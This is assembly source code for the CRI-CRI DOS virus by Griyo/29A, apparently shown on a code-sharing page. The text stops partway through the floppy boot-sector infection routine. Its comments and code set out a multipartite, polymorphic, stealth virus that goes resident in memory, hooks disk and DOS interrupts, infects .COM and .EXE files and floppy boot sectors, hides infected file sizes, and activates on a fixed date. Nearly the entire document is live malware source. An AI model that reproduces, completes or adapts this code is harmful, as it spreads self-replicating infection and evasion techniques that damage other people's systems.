📄 cricri.asm
字号:
;----------------------------------------------------------------------------
;CRI-CRI ViRuS (CoDe by Griyo/29A)
;----------------------------------------------------------------------------
;ResiDenT:
;WheN an inFecTed FiLe is Run thE viRus becaMes ResidEnt inTo a UMB
;memoRy bloCk (if aVaLiabLe) or in conVenTionaL memOry. Then iT
;hOOks int13h and int21h.
;InfEcTion (MulTiPartite):
;CriCri wRitEs itSeLf to The End of .Com and .Exe fiLes that aRe eXecUtEd
;or cLosEd aNd to The BooT SectOr of fLoppY diSks tHat are accEsed. During
;fiLe iNfeCtion the viRus UseS LoW LeveL SysTem fiLe tabLe and HookS
;int03h and int24h.
;CriCri doEs not inFect the fiLes thAt havE diGit or V chaRactErs in
;thEir namEs As weLL as FiLes with toDays DatE and SomE antiVirUs
;eXecuTablEs. InfEcted fiLes Have 62 seCondS in tHeir tiMe sTamp.
;SteALth (fiLe and booT LeveL):
;CriCri reTurNs cLean CopiEs oF inFected fiLes tHat are acceSed and hide
;theiR tRue siZe. The viRus alSo reTurns the OriGinaL boot sEctoR of
;fLoppy disKs tHat aRe read. The viRus disabLes his sTeaLth mechaNism
;when some comPressiOn uttiLities are beinG eXecuted.
;PoLymorPhic:
;The viRus is polymorPHic in fiLes and bOOt secToRs. GenerAted PolymorPHic
;deCrypToR conTains conDitiOnaL and AbsoluTe jumPs as WeLL as subRoutiNes
;and inteRRupt caLLs.
;----------------------------------------------------------------------------
com segment para 'CODE'
assume cs:com,ds:com,es:com,ss:com
;----------------------------------------------------------------------------
;Virus size in bytes
lenvir equ virus_copy-virus_entry
;Virus size in para
para_size equ ((lenvir*02h)+0Fh)/10h
;Virus size in sectors
sector_size equ ((lenvir+1FFh)/200h)
;Decryptor size in bytes
decryptor equ (virus_body-virus_entry)
;Boot code size in bytes
boot_size equ (boot_end-boot_code)
;----------------------------------------------------------------------------
;Create .COM launcher: TASM cricri.asm TLINK /t cricri.obj
org 100h
;----------------------------------------------------------------------------
;Virus entry point
;----------------------------------------------------------------------------
virus_entry:
;Store bp for launcher
sub bp,bp
;Buffer were virus build polymorphic decryptor
db 0280h dup (90h)
virus_body:
;Save segment registers
push ds
push es
;Check if running from boot or file
mov al,byte ptr cs:[prog_type][bp]
cmp al,"B"
je in_boot_sector
jmp go_ahead
;----------------------------------------------------------------------------
;Virus working from boot sector
;----------------------------------------------------------------------------
in_boot_sector:
;Reset DOS loaded flag
mov byte ptr cs:[dos_flag][bp],00h
;Clear dos running switch
mov byte ptr cs:[running_sw],"R"
;Get int 13h vector
mov al,13h
call get_int
;Save old int 13h
mov word ptr cs:[old13h_off][bp],bx
mov word ptr cs:[old13h_seg][bp],es
;Calculate our segment position
mov ax,cs
sub ax,10h
mov ds,ax
;Hook int 13h
mov al,13h
mov dx,offset my_int13h
call set_int
;Restore segment registers
pop es
pop ds
;Reboot system
int 19h
;----------------------------------------------------------------------------
;Wait until dos is loaded
;----------------------------------------------------------------------------
wait_dos:
;Hook int 21h at installation check
test_1:
cmp ah,01h
jne test_2
cmp si,00BADh
jne test_2
cmp di,0FACEh
je dos_installed
;Hook int 21h if we detect a write operation
test_2:
cmp ah,03h
je dos_installed
ret
;Hook int 21h to our handler
dos_installed:
call push_all
;Set dos loaded flag
mov byte ptr cs:[dos_flag],0FFh
;Check dos version
mov ah,30h
int 21h
cmp al,04h
jb exit_wait
;Save old int 21h vector
mov al,21h
call get_int
mov word ptr cs:[old21h_off],bx
mov word ptr cs:[old21h_seg],es
;Get our segment
push cs
pop ds
;Point int 21h to our handler
mov dx,offset my_int21h
mov al,21h
call set_int
exit_wait:
call pop_all
ret
;----------------------------------------------------------------------------
;Running from an executable
;----------------------------------------------------------------------------
go_ahead:
;Installation check
mov si,00BADh
mov di,0FACEh
mov ah,01h
mov dl,80h
int 13h
jc not_installed
cmp si,0DEADh
jne not_installed
cmp di,0BABEh
jne not_installed
jmp control_end
not_installed:
;Check dos version
mov ah,30h
int 21h
cmp al,04h
jae check_date
jmp control_end
check_date:
;Get current date
mov ah,2Ah
int 21h
;Save today's date
mov byte ptr cs:[today][bp],dl
;Activation circunstance: 4th of June
cmp dh,06h
jne no_activation
cmp dl,04h
jne no_activation
jmp print_credits
no_activation:
;Set dos loaded flag
xor al,al
dec al
mov byte ptr cs:[dos_flag][bp],al
;Clear dos running switch
mov byte ptr cs:[running_sw],"R"
;Save old int 13h
mov al,13h
call get_int
mov word ptr cs:[old13h_seg][bp],es
mov word ptr cs:[old13h_off][bp],bx
;Save old int 03h
mov al,03h
call get_int
mov word ptr cs:[old03h_seg][bp],es
mov word ptr cs:[old03h_off][bp],bx
;Save old int 21h
mov al,21h
call get_int
mov word ptr cs:[old21h_seg][bp],es
mov word ptr cs:[old21h_off][bp],bx
;Redirect traced int 21h to int 03h
lds dx,dword ptr cs:[old21h][bp]
mov al,03h
call set_int
;----------------------------------------------------------------------------
;Memory allocation
;----------------------------------------------------------------------------
sub di,di
;Get pointer to dos info block
mov ah,52h
int 03h
;Get pointer to the dos buffers structure
lds si,es:[bx+12h]
;Get address of first umb
mov ax,ds:[si+1Fh]
cmp ax,0FFFFh
je no_umbs
;Follow the chain
nextumb:
mov ds,ax
;Check for free umb's
cmp word ptr ds:[di+01h],di
jnz no_free_umb
;Check if there is enought size
cmp word ptr ds:[di+03h],para_size+01h
ja handle_mcb
no_free_umb:
;Check if this is the last umb
cmp byte ptr ds:[di+00h],"Z"
je no_umbs
;Jump to next umb in the chain
mov ax,ds
inc ax
add ax,word ptr ds:[di+03h]
mov ds,ax
jmp short nextumb
;Allocate memory from last mcb
no_umbs:
;Get pointer to dos info block
mov ah,52h
int 03h
;Get pointer to first mcb
mov ax,es
dec ax
mov es,ax
add bx,12
lds di,dword ptr es:[bx+00h]
;Follow the mcb chain
nextmcb:
;Check if this is the last mcb
cmp byte ptr ds:[di+00h],"Z"
je ok_mcb
;Next mcb
mov ax,ds
inc ax
add ax,word ptr ds:[di+03h]
mov ds,ax
jmp short nextmcb
ok_mcb:
;Check mcb size
cmp word ptr ds:[di+03h],para_size+4000h
ja ok_mcb_size
jmp control_end
ok_mcb_size:
;Sub top of memory in psp
sub word ptr ds:[di+12h],para_size+01h
handle_mcb:
;Sub virus size and mcb size
sub word ptr ds:[di+03h],para_size+01h
;Clear the last mcb field
mov byte ptr ds:[di+00h],"M"
;Jump to next mcb
mov ax,ds
inc ax
add ax,word ptr ds:[di+03h]
mov es,ax
inc ax
push ax
;Mark mcb as last in the chain
mov byte ptr es:[di+00h],"Z"
;Set dos as owner
mov word ptr es:[di+01h],0008h
;Set mcb size
mov word ptr es:[di+03h],para_size
;Mark UMB as system code
mov di,0008h
mov ax,"CS"
cld
stosw
xor ax,ax
stosw
stosw
stosw
;Copy to memory
pop es
mov ax,cs
mov ds,ax
sub di,di
mov si,bp
add si,0100h
mov cx,lenvir
cld
rep movsb
;Save virus segment
mov ax,es
sub ax,10h
mov ds,ax
;Hook int 13h
mov dx,offset my_int13h
mov al,13h
call set_int
;Hook int 21h
mov dx,offset my_int21h
mov al,21h
call set_int
control_end:
;Restore old int 03h
lds dx,dword ptr cs:[old03h][bp]
mov al,03h
call set_int
;Return to host
cmp byte ptr cs:[prog_type][bp],"E"
je exit_exe
;----------------------------------------------------------------------------
;Exit from .COM
;----------------------------------------------------------------------------
exit_com:
;Restore first three bytes
mov ax,cs
mov es,ax
mov ds,ax
mov si,offset old_header
add si,bp
mov di,0100h
mov cx,0003h
cld
rep movsb
;Restore segment registers
pop es
pop ds
;Check if launcher execution
cmp bp,0000h
je endprog
;Get control back to host
push cs
mov ax,0100h
push ax
call zero_all
retf
;Exit program if launcher execution
endprog:
mov ax,4C00h
int 21h
;----------------------------------------------------------------------------
;Exit from .EXE
;----------------------------------------------------------------------------
exit_exe:
;Restore segment registers
pop es
pop ds
;Get control back to host
mov bx,word ptr cs:[file_buffer+16h][bp]
mov ax,cs
sub ax,bx
mov dx,ax
add ax,word ptr cs:[old_header+16h][bp]
add dx,word ptr cs:[old_header+0Eh][bp]
mov bx,word ptr cs:[old_header+14h][bp]
mov word ptr cs:[exeret][bp],bx
mov word ptr cs:[exeret+02h][bp],ax
mov ax,word ptr cs:[old_header+10h][bp]
mov word ptr cs:[fix1][bp],dx
mov word ptr cs:[fix2][bp],ax
call zero_all
db 0B8h
fix1:
dw 0000h
cli
mov ss,ax
db 0BCh
fix2:
dw 0000h
sti
db 0EAh
exeret:
dw 0000h
dw 0000h
;----------------------------------------------------------------------------
;Virus int 13h handler
;----------------------------------------------------------------------------
my_int13h:
cmp byte ptr cs:[dos_flag],00h
jne ok_dos_flag
call wait_dos
ok_dos_flag:
call push_all
;Installation check
cmp ah,01h
jnz not_check
cmp si,00BADh
jne my13h_exit
cmp di,0FACEh
jne my13h_exit
call pop_all
mov si,0DEADh
mov di,0BABEh
stc
cmc
retf 2
not_check:
;Do not use our int 13h handler if we are using our int 21h handler
cmp byte ptr cs:[running_sw],"R"
jne my13h_exit
;Check for read operations
cmp ah,02h
jne short my13h_exit
;Side 0 of drive a:
or dx,dx
jnz short my13h_exit
;Track 0, sector 1
cmp cx,0001h
je infect_floppy
;Get control back to old int 13h
my13h_exit:
call pop_all
jmp dword ptr cs:[old13h]
;----------------------------------------------------------------------------
;Infect floppy on drive a:
;----------------------------------------------------------------------------
infect_floppy:
;Perform read operation
pushf
call dword ptr cs:[old13h]
jnc boot_read_ok
call pop_all
stc
retf 2
boot_read_ok:
;Check for JMP SHORT at the beginning
cmp byte ptr es:[bx+00h],0EBh
jne exit_disk
;Check if infected
call get_position
cmp word ptr es:[di+boot_marker-boot_code],"RC"
jne not_infected
jmp stealth_boot
not_infected:
;Check for mbr marker also in floppy
cmp word ptr es:[bx+01FEh],0AA55h
je floppy_infection
exit_disk:
call pop_all
stc
cmc
retf 2
;Calculate track and head for floppy
floppy_infection:
;Get sectors per track
mov ax,word ptr es:[bx+18h]
mov cx,ax
;Cut one track for virus body
sub word ptr es:[bx+13h],ax
mov ax,word ptr es:[bx+13h]
xor dx,dx
;Divide total sectors by sectors per track
div cx
xor dx,dx
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -